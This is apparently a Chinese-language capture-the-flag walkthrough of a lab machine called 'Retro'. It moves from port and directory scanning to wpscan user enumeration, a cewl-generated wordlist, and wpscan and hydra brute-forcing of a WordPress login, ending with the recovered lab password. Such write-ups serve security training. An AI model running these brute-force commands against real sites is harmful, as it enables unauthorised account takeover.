题目没有给太多的描述,但是根据硬币,复古的得知这是一个像素,复古,FC游戏的爱好者,之前游戏厅里的游戏
信息收集
首先对靶机进行端口扫描
通过扫描得知一共开放80
和3389
这两个端口
访问80
端口发现是IIS
的默认页面
使用gobuster
进行目录扫描
扫描到/retro
目录,访问该页面
这里我访问了很多的页面,可以看出这是一个wordpress
站点
访问wp-login.php
使用admin
和admin
登录失败
使用wpscan
扫描该站点
wpscan --url http://10.10.216.207/retro/wp-login.php -e ap at
通过扫描得到wordpress
版本为5.2.1
尝试枚举用户
wpscan --url http://10.10.216.207/retro/wp-login.php -e u
根据扫描结果没有枚举到用户
通过访问博客的作者可以得到用户名为Wade
但是并不知道密码是什么,这是我们就需要用到一个工具cewl
cewl
可以检索页面关键字生成相对应的用户名和字典
cewl http://10.10.216.207/retro/ -w dict.txt
接着我们使用用户名Wade
,使用cewl
生成的字典dict.txt
对目标wp-login.php
进行密码爆破
注:其实这里的用户名
Wade
可以不区分大小写,因为是windows
机器默认不区分大小写
这里常规的思路是使用wpscan
自带的用户名密码破解进行爆破,这里我为了熟练使用工具,也使用hydra
进行密码爆破
wpscan
密码爆破
wpscan --url http://10.10.216.207/retro/wp-login.php -U Wade -P dict.txt -t 66
成功爆破出用户名Wade
,密码为parzival
hydra
密码爆破
hydra -l Wade -P dict.txt 10.10.216.207 http-post-form "/retro/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fretro%2Fwp-admin%2F&testcookie=1:F=ERROR"
详细参数可以参考我的另一篇博客笔记Hydra(九头蛇)-在线密码爆破程序
也成功爆破出用户名和密码